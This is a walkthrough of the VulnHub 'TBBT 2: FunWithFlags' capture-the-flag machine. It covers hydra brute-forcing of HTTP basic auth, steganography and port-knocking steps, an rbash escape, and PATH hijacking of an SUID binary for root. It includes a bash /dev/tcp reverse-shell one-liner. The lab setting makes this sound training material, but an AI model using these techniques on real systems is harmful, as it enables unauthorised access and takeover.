(VulnHub) [ TBBT: 2 — FunWithFlags ] WriteUp — WalkThrough

VulnHub Link:https://www.vulnhub.com/entry/tbbt-2-funwithflags,461/

Description:

TBBT2: FunWithFlags______             _    _ _ _   _      ______ _                 
| ___| | | | (_) | | | | ___| |
| |_ _ _ _ __ | | | |_| |_| |__ | |_ | | __ _ __ _ ___
| _| | | | '_ \ | |/\| | | __| '_ \ | _| | |/ _` |/ _` / __|
| | | |_| | | | | \ /\ / | |_| | | | | | | | (_| | (_| \__ \
\_| \__,_|_| |_| \/ \/|_|\__|_| |_| \_| |_|\__,_|\__, |___/
__/ |
|___/
Welcome to "Fun with Flags" 2!This boot2root machine is themed after the famous TV show, The Big Bang Theory and has strong CTF elements.Goal: Hack Sheldon and get user and root flagsDifficulty: Intermediate Runs only with VirtualBox!
DHCP is enabled
Need hints? Tweet @emaragkosYour feedback is really valuable for me!Was there something that you didn’t like about it? Maybe something you have liked more if it was different?Good luck and have fun :)This works best with VirtualBox rather than VMware

Nmap Scan:

> nmap -sC -sV 192.168.56.107
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-21 10:56 GMT Daylight Time
Nmap scan report for 192.168.56.107
Host is up (0.00032s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:1E:75:FE (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.99 seconds

We have only 1 opened port

Image for post

So from the web page we can save some notes …

The only user can login is sheldon

We ain’t going anywhere yet ! … In the same page and in source code we have a comment:

<!--Hint for my future self in case I forget my password /fyhd7fhf84ihdiksowj -->

By going to this directory “http://tbbt2.local/fyhd7fhf84ihdiksowj/" we have this HTML codes:

<html>
<head>
<script language="Javascript" src="5hf7eh39djkf83h2ikfo.js"></script>
</head>
<body>
</body>
</html>

That uses a JS file on “ http://tbbt2.local/fyhd7fhf84ihdiksowj/5hf7eh39djkf83h2ikfo.js “ :

// good luck with deobfuscation
// the easy way or the hard way? which one will you take?
var erp = new Array;
erp[0] = 1008813135;
erp[1] = 1129601360;
erp[2] = 1159751796;
erp[3] = 1835810317;
erp[4] = 171731060;
erp[5] = 1835810317;
erp[6] = 168626748;
erp[7] = 1751474532;
erp[8] = 1041041952;
erp[9] = 540832873;
erp[10] = 1953260862;
erp[11] = 1164797298;
erp[12] = 1734700643;
erp[13] = 2032169573;
erp[14] = 1835626084;
erp[15] = 1701985327;
erp[16] = 1953068140;
erp[17] = 1698565386;
erp[18] = 1009739877;
erp[19] = 1633959437;
erp[20] = 168626748;
erp[21] = 1651467385;
erp[22] = 1041041933;
erp[23] = 171730995;
erp[24] = 1044669793;
erp[25] = 1914726005;
erp[26] = 1953854053;
erp[27] = 542337125;
erp[28] = 1818521454;
erp[29] = 1009739827;
erp[30] = 1041041980;
erp[31] = 1883134319;
erp[32] = 1965058926;
erp[33] = 1870078071;
erp[34] = 1751217184;
erp[35] = 1953439844;
erp[36] = 1865162873;
erp[37] = 1869946989;
erp[38] = 1633969440;
erp[39] = 1952999795;
erp[40] = 557592432;
erp[41] = 1041041980;
erp[42] = 556608854;
erp[43] = 1629515886;
erp[44] = 1718755446;
erp[45] = 1931506530;
erp[46] = 1702130279;
erp[47] = 544893984;
erp[48] = 1668179558;
erp[49] = 1784833393;
erp[50] = 542515317;
erp[51] = 1852404256;
erp[52] = 1734484084;
erp[53] = 1646290786;
erp[54] = 539977589;
erp[55] = 1918854514;
erp[56] = 1853448038;
erp[57] = 1919968626;
erp[58] = 1734308214;
erp[59] = 1696624225;
erp[60] = 1897952098;
erp[61] = 2037998186;
erp[62] = 544306789;
erp[63] = 1919969142;
erp[64] = 1650550317;
erp[65] = 759041290;
erp[66] = 218774575;
erp[67] = 1651467385;
erp[68] = 1041041933;
erp[69] = 171716456;
erp[70] = 1953328190;
erp[71] = 218762506;
erp[72] = 3338;
var em = '';
for(i=0;i<erp.length;i++){
tmp = erp[i];
if(Math.floor((tmp/Math.pow(256,3)))>0){
em += String.fromCharCode(Math.floor((tmp/Math.pow(256,3))));
};
tmp = tmp - (Math.floor((tmp/Math.pow(256,3))) * Math.pow(256,3));
if(Math.floor((tmp/Math.pow(256,2)))>0){
em += String.fromCharCode(Math.floor((tmp/Math.pow(256,2))));
};
tmp = tmp - (Math.floor((tmp/Math.pow(256,2))) * Math.pow(256,2));
if(Math.floor((tmp/Math.pow(256,1)))>0){
em += String.fromCharCode(Math.floor((tmp/Math.pow(256,1))));
};
tmp = tmp - (Math.floor((tmp/Math.pow(256,1))) * Math.pow(256,1));
if(Math.floor((tmp/Math.pow(256,0)))>0){
em += String.fromCharCode(Math.floor((tmp/Math.pow(256,0))));
};
};
document.write(em);

Let’s run this in our Browser console (In The Browser Press F12) and change the last line document.write(em) with alert(em) ==> Lazy ! I know …

Something pop-out (HTML Codes):

<!DOCTYPE html><html><head>  <title>Emergency reminder</title></head><body><h3>Dear future Sheldon</h3><p>You know what to do, you made this!</p><!--Va pnfr vs sbetrg zl cnffjbeq V unir gb tb gb /gur_erny_frperg_qve naq sbyybj qverpgvbaf-->
</body>
</html>

We have another html page with a comment (highlighted) but looks unreadable for humans !

I know already this Cipher that called ROT13

ROT13 is a simple letter substitution cipher that replaces a letter with the 13th letter after it, in the alphabet.

And to decrypt the message just go to rot13.com (Online Tool) and put The comment without changing anything:

<!--In case if forget my password I have to go to /the_real_secret_dir and follow directions-->

We have a New directory to browse named “the_real_secret_dir” Let’s browse it and see

http://tbbt2.local/the_real_secret_dir/

The directory is protected with AuthBasic , and we need to bypass it or to bruteforce but we don’t have any credentials yet let’s keep enumerating we might find something … !

Now Let’s run our DirBuster for sensitive files and folders search … :

Folders:
http://192.168.56.107/secret/
Files:
http://192.168.56.107/password.txt

I found only one folder and one text file, let’s start we the folder …

http://192.168.56.107/secret/

Is taking us to “/secret/A/G/N/I/Z/A/B/”

<h1>Now read that backwards</h1>
<img src="bazinga.webp" /></br>
Try harder..

Actually I don’t know what I will do with that folder but it says ‘Try harder’ which means we aren’t in the right way …

And we have also the file

http://192.168.56.107/password.txt

containing this

Password reminder in case I get a head trauma resulting in amnesia.
I have hidden the first characters. (lowercase letters)
***train

So this is a password reminder and he put 3 stars before train which means we have 3 lowercase letters (as mentioned) let’s use this PHP Word List Generator ❤

https://github.com/gehaxelt/PHP-WordlistGenerator

Or we can use crunch (Python Tool I Think !) But I always prefer PHP :D

<?php
include_once 'wordlistgenerator.class.php';
for ($i=2;$i<=3;$i++)
{
$ws = new WordlistGenerator($i,'abcdefghijklmnopqrstuvwxyz');
while($ws->isNext()) {
echo $ws->getWord()."train";
file_put_contents("tbbt2_wordlist.txt",$ws->getWord()."train\n",FILE_APPEND);
$ws->nextWord();
echo "\n";
}
unset($ws);
}
?>

After we run it from our terminal :

php tbbt2_wordlistgen.php

The tool will save the results in : “tbbt2_wordlist.txt” and now can use this passlist in bruteforcing the directory we found earlier

/the_real_secret_dir

Let’s go back to our terminal and use hydra for this process

> hydra -l sheldon -P tbbt2_wordlist.txt -f 192.168.56.107 http-get /the_real_secret_dir
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-21 14:50:31
[DATA] max 16 tasks per 1 server, overall 16 tasks, 18250 login tries (l:1/p:0), ~18250 tries per task
[DATA] attacking http-get://192.168.56.107:80/the_real_secret_dir
[STATUS] 8682.00 tries/min, 8682 tries in 00:00h, 0 to do in 01:00h, 9568 active
[80][http-get] host: 192.168.56.107 login: sheldon password: oldtrain
[STATUS] attack finished for 192.168.56.107 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-21 14:51:42

We have a valid password as you see : “oldtrain” let’s go back to our browser and login …

Image for post

The HTML Source:

Every door comes with a key, here is yours:</br>
Password: /the_real_secret_dir/p4ssw0rd.txt
Now that you have found the key, you also have to find the door</br>
<font color="white">(Hint for my future self: I dont like handshakes, so I dont use them)</font></br>
<img src="alwaysknock3times.gif" alt="Always be polite and knock 3 times"></br>
<img src="secret_message.jpg" alt="Here is your door"></br>

The line below isn’t shown in webpage cause as you see the font color is white but if you select the text you’ll see it

<font color="white">(Hint for my future self: I dont like handshakes, so I dont use them)</font></br>

let’s continue …
http://192.168.56.107/the_real_secret_dir/p4ssw0rd.txt

Soft kitty, warm kitty	    	     	       	    	     	    	     
Little ball of fur

Happy kitty, sleepy kitty
Purr, purr, purr

If you noticed there is some weird spaces on the text file and if you download the p4ssw0rd.txt file and open it using sublime text and select the text you’ll notice some weird dashes and dots … !

Image for post

After some googling and a help of a friend …

This is something called “spacewhite steganography” Or “snow steganography” (really old thing if you will check the website below)

http://www.darkside.com.au/snow/

You can download the binary/executable file and after reading the manual page (-p is for password and in our case we won’t use it cause we don’t have any passwods)

To extract the message, the command would be
snow -C -p "hello world" outfile

let’s decrypt our file :)

C:\Users\ADMIN\Desktop\snow
> snow -C p4ssw0rd.txt
ilikeklingon

so it says he like klingon ! what klingon is …

Image for post

And the klingon alphabet says :

Image for post

If we go back to “the_real_secret_dir” we have an image “secret_message.jpg”

Image for post

and by matching it using the list above (klingon alphabet) we get :

1000 2000 3000

and by staying on that page (the_real_secret_dir) we have a hint that says :

You need to knock the door 3 times politely

And the most important parts says:

sheldon hates handshakes

Which means in our language we need to knock on the 3 UDP ports (not TCP) !

If you don’t know what port knocking is read this

Or you can read my simple explanation :

Knockd is a service that hide the SSH Port but once you knock the ports in the right sequence … you’ll be able to reach it !

So for windows users there is an interesting autoit3 tool

http://gregsowell.com/?p=2020

And for Linux Users or for both you can use instead of it use nmap (Actually I’m not sure if this is the right command I didn’t try it … I always use the Win tool above,but I’m using U for UDP’s xD)

nmap -sU 192.168.56.107 -p 1000,2000,3000

and once the process complete you go to ssh login and use the password “ilikeklingon” and you are in :D

You can also login from VM Box …

okay now going back to our terminal, each minute I have a message popping out :

Broadcast message from root@tbbt2 (somewhere) (Tue Apr 21 19:28:01 2020):Antihacker script activated
Broadcast message from root@tbbt2 (somewhere) (Tue Apr 21 19:29:01 2020):Antihacker script activated
Broadcast message from root@tbbt2 (somewhere) (Tue Apr 21 19:30:01 2020):Antihacker script activated

So I run linpeas.sh for fast enumeration and here is a resume of what might be helpful

[+] Users with console
root:x:0:0:root:/root:/bin/bash
sheldon:x:1001:1001::/home/sheldon:/bin/rbash
tbbt2:x:1000:1000:tbbt2,,,:/home/tbbt2:/bin/bash
[+] Looking for Knock configuration
Config Knock file found!:
/etc/knockd.conf
Sequence found!:
sequence = 1000:udp,2000:udp,3000:udp
[+] Looking for root files in home dirs (limit 20)
/home
/home/sheldon/Desktop/.iliketrains.c
/home/sheldon/Desktop/iliketrains
/home/sheldon/Desktop/.antihacker.py
[+] Files inside others home (limit 20)
/home/tbbt2/.profile
/home/tbbt2/.ICEauthority
/home/tbbt2/.bash_logout
/home/tbbt2/.vboxclient-seamless.pid
/home/tbbt2/.vboxclient-draganddrop.pid
/home/tbbt2/.vboxclient-display.pid
/home/tbbt2/.xsession-errors
/home/tbbt2/Pictures/Screenshot from 2020-03-25 11-24-21.png
/home/tbbt2/.sudo_as_admin_successful
/home/tbbt2/.bashrc
/home/tbbt2/.Xauthority
/home/tbbt2/.bash_history
[+] Looking for specific hashes inside files - less false positives (limit 70)
/etc/apache2/.htpasswd:$apr1$5ycg2oem$3HQpg64hnAPt6nAaWaGph0
/var/www/tbbt2/the_real_secret_dir/.htpasswd:$apr1$ry6xzq0t$3jOthY4TQOZL38YaCDMYO.

We have a weird binary file named “iliketrains” in Sheldon’s desktop

-rwsr-xr-x 1 root root 8392 Απρ   7 01:33 /home/sheldon/Desktop/iliketrains

So by going to the Desktop directory and trying to read the source code

sheldon@tbbt2:~$ cd Desk-rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: `-a2': invalid number specifier
-rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: `-a0': invalid number specifier
Broadcast message from root@tbbt2 (somewhere) (Tue Apr 21 20:49:01 2020):Antihacker script activated
-rbash: cd: restricted

we have some restricted commands, To bypass that let’s type in the terminal

bash — noprofile

sheldon@tbbt2:~$ bash --noprofileBroadcast message from root@tbbt2 (somewhere) (Tue Apr 21 20:51:01 2020):Antihacker script activatedsheldon@tbbt2:~$ cd Desktop
sheldon@tbbt2:~/Desktop$ ls -la
total 32
drwxr-xr-x 2 sheldon sheldon 4096 Απρ 21 20:24 .
drwxr-xr-x 16 sheldon sheldon 4096 Απρ 21 19:25 ..
-rwxr-x--- 1 root root 225 Απρ 7 01:35 .antihacker.py
-rwsr-xr-x 1 root root 8392 Απρ 7 01:33 iliketrains
-rw-r--r-- 1 root root 71 Απρ 7 01:28 .iliketrains.c

Now we are able to use our shell without problems let’s see the source code of file .iliketrains.c

#include<unistd.h>
void main()
{
setuid(0);
setgid(0);
system("sl");
}

what the sl is !

sheldon@tbbt2:~/Desktop$ which sl
/usr/games/sl

something in games folder and when you run it there is only a train so how to exploit that the easiest way is creating a file named sl in the desktop directory and run it

echo "bash -c 'bash -i >& /dev/tcp/192.168.56.1/4444 0>&1'" > sl

Or you can only have a direct shell and give it execute privileges

echo "/bin/bash" > sl

without forgetting to export the current directory into PATH variable

sheldon@tbbt2:~/Desktop$ export PATH=/home/sheldon/Desktop:$PATH
sheldon@tbbt2:~/Desktop$ ./iliketrains
sh: 1: sl: Permission denied
sheldon@tbbt2:~/Desktop$ chmod +x sl
sheldon@tbbt2:~/Desktop$ ./iliketrains
root@tbbt2:~/Desktop#

and we are r00t

root@tbbt2:~/Desktop# id
bash: id: command not found
root@tbbt2:~/Desktop# export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
root@tbbt2:~/Desktop# id
uid=0(root) gid=0(root) groups=0(root),1001(sheldon)
root@tbbt2:~/Desktop# cd /root
root@tbbt2:/root# ls
Desktop Documents Downloads flag.txt Music Pictures Public Templates Videos
root@tbbt2:/root# cat flag.txt
Good job, you pwned me!
The flag is a real amazon gift card.
You could buy an InfoSec book or some toilet paper, its up to you.
If you think you are the first to solve this go claim it, ASAP!
flag{xxxx-xxxxx-xxxx}

There is an amazon card as a gift for the first box solver and It seems that I was not the first :p

A Big Thanks to my Serbian friend (Milan) who helped lot in Steganography things :D

And feel free to ask me questions in comments, and don’t forget to share it with your friends.

Follow me on Twitter : https://twitter.com/DamaneDz
If you liked my writeup and you want to buy me a coffee :
https://www.buymeacoffee.com/DamaneDz

Written by

#Securing | #Researching | #Coding | #Developing

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store